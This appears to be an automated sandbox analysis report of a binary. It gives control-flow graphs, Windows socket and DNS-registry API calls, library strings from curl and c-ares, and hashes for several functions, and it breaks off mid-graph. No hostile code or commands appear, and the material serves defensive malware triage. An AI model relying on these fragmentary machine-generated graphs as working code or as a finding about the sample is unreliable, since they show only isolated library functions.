                                  control_flow_graph 1511 4205b0-4205b7 1512 4207ee 1511->1512 1513 4205bd-4205d4 1511->1513 1514 4207e7-4207ed 1513->1514 1515 4205da-4205e6 1513->1515 1514->1512 1515->1514 1516 4205ec-4205f0 1515->1516 1517 4205f6-420620 call 427350 call 4170b0 1516->1517 1518 4207c7-4207cc 1516->1518 1523 420622-420624 1517->1523 1524 42066a-42068c call 44dec0 1517->1524 1518->1514 1525 420630-420655 call 4170d0 call 4203c0 call 427450 1523->1525 1530 420692-4206a0 1524->1530 1531 4207d6-4207e3 call 427380 1524->1531 1551 42065b-420668 call 4170e0 1525->1551 1552 4207ce 1525->1552 1534 4206a2-4206a4 1530->1534 1535 4206f4-4206f6 1530->1535 1531->1514 1540 4206b0-4206e4 call 4273b0 1534->1540 1537 4207ef-42082b call 423000 1535->1537 1538 4206fc-4206fe 1535->1538 1555 420831-420837 1537->1555 1556 420a2f-420a35 1537->1556 1543 42072c-420754 1538->1543 1540->1531 1550 4206ea-4206ee 1540->1550 1547 420756-42075b 1543->1547 1548 42075f-42078b 1543->1548 1553 420707-420719 WSAEventSelect 1547->1553 1554 42075d 1547->1554 1566 420700-420703 1548->1566 1567 420791-420796 1548->1567 1550->1540 1557 4206f0 1550->1557 1551->1524 1551->1525 1552->1531 1553->1531 1561 42071f 1553->1561 1562 420723-420726 1554->1562 1564 420861-42087e 1555->1564 1565 420839-42084c call 426fa0 1555->1565 1558 420a37-420a3a 1556->1558 1559 420a3c-420a52 1556->1559 1557->1535 1558->1559 1559->1531 1569 420a58-420a81 call 422f10 1559->1569 1561->1562 1562->1537 1562->1543 1578 420882-42088d 1564->1578 1576 420852 1565->1576 1577 420a9c-420aa4 1565->1577 1566->1553 1567->1566 1571 42079c-4207c2 call 4176a0 1567->1571 1569->1531 1584 420a87-420a97 call 426df0 1569->1584 1571->1566 1576->1564 1581 420854-42085f 1576->1581 1577->1531 1582 420893-4208b1 1578->1582 1583 420970-420975 1578->1583 1581->1578 1587 4208c8-4208f7 1582->1587 1585 42097b-420989 call 4170b0 1583->1585 1586 420a19-420a2c 1583->1586 1584->1531 1585->1586 1594 42098f-42099e 1585->1594 1586->1556 1595 4208f9-4208fb 1587->1595 1596 4208fd-420925 1587->1596 1597 4209b0-4209c1 call 4170d0 1594->1597 1598 420928-42093f 1595->1598 1596->1598 1604 4209c3-4209c7 1597->1604 1605 4209a0-4209ae call 4170e0 1597->1605 1602 4208b3-4208c2 1598->1602 1603 420945-42096b 1598->1603 1602->1583 1602->1587 1603->1602 1607 4209e8-420a03 WSAEnumNetworkEvents 1604->1607 1605->1586 1605->1597 1608 4209d0-4209e6 WSAEventSelect 1607->1608 1609 420a05-420a17 1607->1609 1608->1605 1608->1607 1609->1608
                                  APIs
                                  • WSAEventSelect.WS2_32(?,?,?), ref: 00420711
                                  • WSAEventSelect.WS2_32(?,?,00000000), ref: 004209DC
                                  • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 004209FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000ED6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EDF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EED000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416221948.0000000000EEE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416342757.00000000010A2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416378233.00000000010A4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID: EventSelect$EnumEventsNetwork
                                  • String ID: N=A$multi.c
                                  • API String ID: 2170980988-1472865492
                                  • Opcode ID: f3f99bd46820f3c5d84d907e25df5ea4cffaf5ada571fe2e42df7c5ccc88e08b
                                  • Instruction ID: 6e4ce9240adf1426a00906f67b4002a3b808652f910f8282f3f8f6e8c5cf06c8
                                  • Opcode Fuzzy Hash: f3f99bd46820f3c5d84d907e25df5ea4cffaf5ada571fe2e42df7c5ccc88e08b
                                  • Instruction Fuzzy Hash: F7D1CF717083019FE710DF64E881BABB7E5FF94348F84482EF98586242E778E945CB5A
                                  Function 004DB180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1780 4db180-4db195 1781 4db19b-4db1a2 1780->1781 1782 4db3e0-4db3e7 1780->1782 1783 4db1b0-4db1b9 1781->1783 1783->1783 1784 4db1bb-4db1bd 1783->1784 1784->1782 1785 4db1c3-4db1d0 1784->1785 1787 4db3db 1785->1787 1788 4db1d6-4db1f2 1785->1788 1787->1782 1789 4db229-4db22d 1788->1789 1790 4db3e8-4db417 1789->1790 1791 4db233-4db246 1789->1791 1799 4db41d-4db429 1790->1799 1800 4db582-4db589 1790->1800 1792 4db248-4db24b 1791->1792 1793 4db260-4db264 1791->1793 1794 4db24d-4db256 1792->1794 1795 4db215-4db223 1792->1795 1797 4db269-4db286 call 4daf30 1793->1797 1794->1797 1795->1789 1798 4db315-4db33c call 798b00 1795->1798 1809 4db288-4db2a3 call 4db060 1797->1809 1810 4db2f0-4db301 1797->1810 1813 4db3bf-4db3ca 1798->1813 1814 4db342-4db347 1798->1814 1803 4db42b-4db433 call 4db590 1799->1803 1804 4db435-4db44c call 4db590 1799->1804 1803->1804 1817 4db44e-4db456 call 4db590 1804->1817 1818 4db458-4db471 call 4db590 1804->1818 1824 4db2a9-4db2c7 getsockname call 4db020 1809->1824 1825 4db200-4db213 call 4db020 1809->1825 1810->1795 1828 4db307-4db310 1810->1828 1819 4db3cc-4db3d9 1813->1819 1821 4db349-4db358 1814->1821 1822 4db384-4db38f 1814->1822 1817->1818 1838 4db48c-4db4a7 1818->1838 1839 4db473-4db487 1818->1839 1819->1782 1829 4db360-4db382 1821->1829 1822->1813 1823 4db391-4db3a5 1822->1823 1830 4db3b0-4db3bd 1823->1830 1836 4db2cc-4db2dd 1824->1836 1825->1795 1828->1819 1829->1822 1829->1829 1830->1813 1830->1830 1836->1795 1840 4db2e3 1836->1840 1841 4db4a9-4db4b1 call 4db660 1838->1841 1842 4db4b3-4db4cb call 4db660 1838->1842 1839->1800 1840->1828 1841->1842 1847 4db4cd-4db4d5 call 4db660 1842->1847 1848 4db4d9-4db4f5 call 4db660 1842->1848 1847->1848 1853 4db50d-4db52b call 4db770 * 2 1848->1853 1854 4db4f7-4db50b 1848->1854 1853->1800 1859 4db52d-4db531 1853->1859 1854->1800 1860 4db580 1859->1860 1861 4db533-4db53b 1859->1861 1860->1800 1862 4db53d-4db547 1861->1862 1863 4db578-4db57e 1861->1863 1862->1863 1864 4db549-4db54d 1862->1864 1863->1800 1864->1863 1865 4db54f-4db558 1864->1865 1865->1863 1866 4db55a-4db576 call 4db870 * 2 1865->1866 1866->1800 1866->1863
                                  APIs
                                  • getsockname.WS2_32(-00000020,-00000020,?), ref: 004DB2B7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000ED6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EDF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EED000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416221948.0000000000EEE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416342757.00000000010A2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416378233.00000000010A4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID: getsockname
                                  • String ID: ares__sortaddrinfo.c$cur != NULL
                                  • API String ID: 3358416759-2430778319
                                  • Opcode ID: 053486b79859b049cde0b2b24eb9c35701305ae1ecce6bfc5fa6d0470fe7c8cb
                                  • Instruction ID: 1ac805cb591f05e9abf6a6a4ff6e4494cdd102a42189ca22c904ce2e4b95e9f7
                                  • Opcode Fuzzy Hash: 053486b79859b049cde0b2b24eb9c35701305ae1ecce6bfc5fa6d0470fe7c8cb
                                  • Instruction Fuzzy Hash: E5C17D31604205DFD718DF25C8A4A6A77E1EF89304F06896FE8898B3A1DB38ED45CBC5
                                  Function 00426FA0 Relevance: 1.8, APIs: 1, Instructions: 261COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000ED6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EDF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EED000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416221948.0000000000EEE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416342757.00000000010A2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416378233.00000000010A4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1ab34b7908defb24eb00f072905c486faebfa00acb1a07dc16362ca3ce990bf0
                                  • Instruction ID: 76e3b8fa2f2df8b5f33a1c5823e5acaa27c900ae345937c77f076a97395207e2
                                  • Opcode Fuzzy Hash: 1ab34b7908defb24eb00f072905c486faebfa00acb1a07dc16362ca3ce990bf0
                                  • Instruction Fuzzy Hash: 1E91253070D3698BD7358A28A8907BB72D5FFC0360F948B2EE898432D4EB789C51D695
                                  Function 004DA870 Relevance: 1.5, APIs: 1, Instructions: 33networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • recv.WS2_32(000000FF,004C6F4E,000000FF,00000000,00000000,000000FF,004C6F4E,000000FF,?,00000000,?), ref: 004DA8B0
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000ED6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EDF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EED000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416221948.0000000000EEE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416342757.00000000010A2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416378233.00000000010A4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID: recv
                                  • String ID:
                                  • API String ID: 1507349165-0
                                  • Opcode ID: f639e02f5d8b0293d088b36822403739fae1a24a3c89de9e1d75654e0afa5a83
                                  • Instruction ID: 7ab96e13ed1139ff0bfa1f54910113aee711ae1df87c40c5f9a2ad19b213132b
                                  • Opcode Fuzzy Hash: f639e02f5d8b0293d088b36822403739fae1a24a3c89de9e1d75654e0afa5a83
                                  • Instruction Fuzzy Hash: 4AF03072B057217FD5249A18EC55FABF369EFC4B20F14891AB944673488360BC5186E6
                                  Function 004CA440 Relevance: 44.8, APIs: 17, Strings: 8, Instructions: 1066registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 004CAA19
                                  • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 004CAA4C
                                  • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 004CAA97
                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 004CAAE9
                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 004CAB30
                                  • RegCloseKey.KERNELBASE(?), ref: 004CAB6A
                                  • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 004CAB82
                                  • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 004CAC46
                                  • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 004CAD0A
                                  • RegEnumKeyExA.KERNELBASE ref: 004CAD8D
                                  • RegCloseKey.KERNELBASE(?), ref: 004CADD9
                                  • RegEnumKeyExA.KERNELBASE ref: 004CAE08
                                  • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 004CAE2A
                                  • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 004CAE54
                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 004CAF63
                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 004CAFB2
                                  • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 004CB072
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000ED6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EDF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EED000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416221948.0000000000EEE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416342757.00000000010A2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416378233.00000000010A4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID: QueryValue$Open$CloseEnum
                                  • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                  • API String ID: 4217438148-1047472027
                                  • Opcode ID: 003668f24d1aae51902982bcdb694ff895724796f2e25593fabb7bfbe52869fb
                                  • Instruction ID: aa7415ec869a6998624071d082a5b19a9f05733cfd475ac3344a119fa9d3036c
                                  • Opcode Fuzzy Hash: 003668f24d1aae51902982bcdb694ff895724796f2e25593fabb7bfbe52869fb
                                  • Instruction Fuzzy Hash: 3172EFB5604301ABE710DB24CC82F6B77E8AF85708F18482DF985D7291E779E914CB67
                                  Function 0044A550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                  Download Yara Rule
                                  APIs
                                  • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0044A831
                                  Strings
                                  • Trying [%s]:%d..., xrefs: 0044A689
                                  • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0044A6CE
                                  • Couldn't bind to '%s' with errno %d: %s, xrefs: 0044AE1F
                                  • Trying %s:%d..., xrefs: 0044A7C2, 0044A7DE
                                  • Local port: %hu, xrefs: 0044AF28
                                  • Local Interface %s is ip %s using address family %i, xrefs: 0044AE60
                                  • Name '%s' family %i resolved to '%s' family %i, xrefs: 0044ADAC
                                  • @, xrefs: 0044A8F4
                                  • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0044AD0A
                                  • Could not set TCP_NODELAY: %s, xrefs: 0044A871
                                  • bind failed with errno %d: %s, xrefs: 0044B080
                                  • cf_socket_open() -> %d, fd=%d, xrefs: 0044A796
                                  • Bind to local port %d failed, trying next, xrefs: 0044AFE5
                                  • @, xrefs: 0044AC42
                                  • cf-socket.c, xrefs: 0044A5CD, 0044A735
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000ED6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EDF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EED000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416221948.0000000000EEE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416342757.00000000010A2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416378233.00000000010A4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID: setsockopt
                                  • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                  • API String ID: 3981526788-2373386790
                                  • Opcode ID: 2d0de426dd7edc379d87a7a772b8ecd63e5c458cdba63ac5d89fe06eb26c798c
                                  • Instruction ID: 5824c343d972532e52f983acaa9197db65a8fd04d6087664e06199d4bac99a57
                                  • Opcode Fuzzy Hash: 2d0de426dd7edc379d87a7a772b8ecd63e5c458cdba63ac5d89fe06eb26c798c
                                  • Instruction Fuzzy Hash: 4762E271648341ABF720CF14C846BABB7E4EF81318F04491EF98897292E779E855CB97
                                  Function 004D9740 Relevance: 16.5, APIs: 3, Strings: 6, Instructions: 743registryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 943 4d9740-4d975b 944 4d975d-4d9768 call 4d78a0 943->944 945 4d9780-4d9782 943->945 954 4d976e-4d9770 944->954 955 4d99bb-4d99c0 944->955 947 4d9788-4d97a0 call 798e00 call 4d78a0 945->947 948 4d9914-4d994e call 798b70 RegOpenKeyExA 945->948 947->955 960 4d97a6-4d97c5 947->960 958 4d995a-4d9992 RegQueryValueExA RegCloseKey call 798b98 948->958 959 4d9950-4d9955 948->959 954->960 961 4d9772-4d977e 954->961 956 4d9a0c-4d9a15 955->956 973 4d9997-4d99b5 call 4d78a0 958->973 959->956 966 4d9827-4d9833 960->966 967 4d97c7-4d97e0 960->967 961->947 969 4d985f-4d9872 call 4d5ca0 966->969 970 4d9835-4d985c call 4ce2b0 * 2 966->970 971 4d97f6-4d9809 967->971 972 4d97e2-4d97f3 call 798b50 967->972 984 4d9878-4d987d call 4d77b0 969->984 985 4d99f0 969->985 970->969 971->966 983 4d980b-4d9810 971->983 972->971 973->955 973->960 983->966 989 4d9812-4d9822 983->989 990 4d9882-4d9889 984->990 988 4d99f5-4d99fb call 4d5d00 985->988 998 4d99fe-4d9a09 988->998 989->956 990->988 994 4d988f-4d989b call 4c4fe0 990->994 994->985 1001 4d98a1-4d98c3 call 798b50 call 4d78a0 994->1001 998->956 1007 4d98c9-4d98db call 4ce2d0 1001->1007 1008 4d99c2-4d99ed call 4ce2b0 * 2 1001->1008 1007->1008 1013 4d98e1-4d98f0 call 4ce2d0 1007->1013 1008->985 1013->1008 1018 4d98f6-4d9905 call 4d63f0 1013->1018 1023 4d990b-4d990f 1018->1023 1024 4d9f66-4d9f7f call 4d5d00 1018->1024 1026 4d9a3f-4d9a5a call 4d6740 call 4d63f0 1023->1026 1024->998 1026->1024 1032 4d9a60-4d9a6e call 4d6d60 1026->1032 1035 4d9a1f-4d9a39 call 4d6840 call 4d63f0 1032->1035 1036 4d9a70-4d9a94 call 4d6200 call 4d67e0 call 4d6320 1032->1036 1035->1024 1035->1026 1047 4d9a16-4d9a19 1036->1047 1048 4d9a96-4d9ac6 call 4cd120 1036->1048 1047->1035 1049 4d9fc1 1047->1049 1054 4d9ac8-4d9adb call 4cd120 1048->1054 1055 4d9ae1-4d9af7 call 4cd190 1048->1055 1051 4d9fc5-4d9ffd call 4d5d00 call 4ce2b0 * 2 1049->1051 1051->998 1054->1035 1054->1055 1055->1035 1062 4d9afd-4d9b09 call 4c4fe0 1055->1062 1062->1049 1067 4d9b0f-4d9b29 call 4ce730 1062->1067 1072 4d9b2f-4d9b3a call 4d78a0 1067->1072 1073 4d9f84-4d9f88 1067->1073 1072->1073 1080 4d9b40-4d9b54 call 4ce760 1072->1080 1075 4d9f95-4d9f99 1073->1075 1077 4d9f9b-4d9f9e 1075->1077 1078 4d9fa0-4d9fb6 call 4cebf0 * 2 1075->1078 1077->1049 1077->1078 1090 4d9fb7-4d9fbe 1078->1090 1086 4d9f8a-4d9f92 1080->1086 1087 4d9b5a-4d9b6e call 4ce730 1080->1087 1086->1075 1093 4d9b8c-4d9b97 call 4d63f0 1087->1093 1094 4d9b70-4da004 1087->1094 1090->1049 1102 4d9b9d-4d9bbf call 4d6740 call 4d63f0 1093->1102 1103 4d9c9a-4d9cab call 4cea00 1093->1103 1099 4da015-4da01d 1094->1099 1100 4da01f-4da022 1099->1100 1101 4da024-4da045 call 4cebf0 * 2 1099->1101 1100->1051 1100->1101 1101->1051 1102->1103 1121 4d9bc5-4d9bda call 4d6d60 1102->1121 1112 4d9f31-4d9f35 1103->1112 1113 4d9cb1-4d9ccd call 4cea00 call 4ce960 1103->1113 1115 4d9f37-4d9f3a 1112->1115 1116 4d9f40-4d9f61 call 4cebf0 * 2 1112->1116 1129 4d9cfd-4d9d0e call 4ce960 1113->1129 1130 4d9ccf 1113->1130 1115->1035 1115->1116 1116->1035 1121->1103 1132 4d9be0-4d9bf4 call 4d6200 call 4d67e0 1121->1132 1142 4d9d10 1129->1142 1143 4d9d53-4d9d55 1129->1143 1133 4d9cd1-4d9cec call 4ce9f0 call 4ce4a0 1130->1133 1132->1103 1149 4d9bfa-4d9c0b call 4d6320 1132->1149 1154 4d9cee-4d9cfb call 4ce9d0 1133->1154 1155 4d9d47-4d9d51 1133->1155 1144 4d9d12-4d9d2d call 4ce9f0 call 4ce4a0 1142->1144 1147 4d9e69-4d9e8e call 4cea40 call 4ce440 1143->1147 1170 4d9d2f-4d9d3c call 4ce9d0 1144->1170 1171 4d9d5a-4d9d6f call 4ce960 1144->1171 1173 4d9e94-4d9eaa call 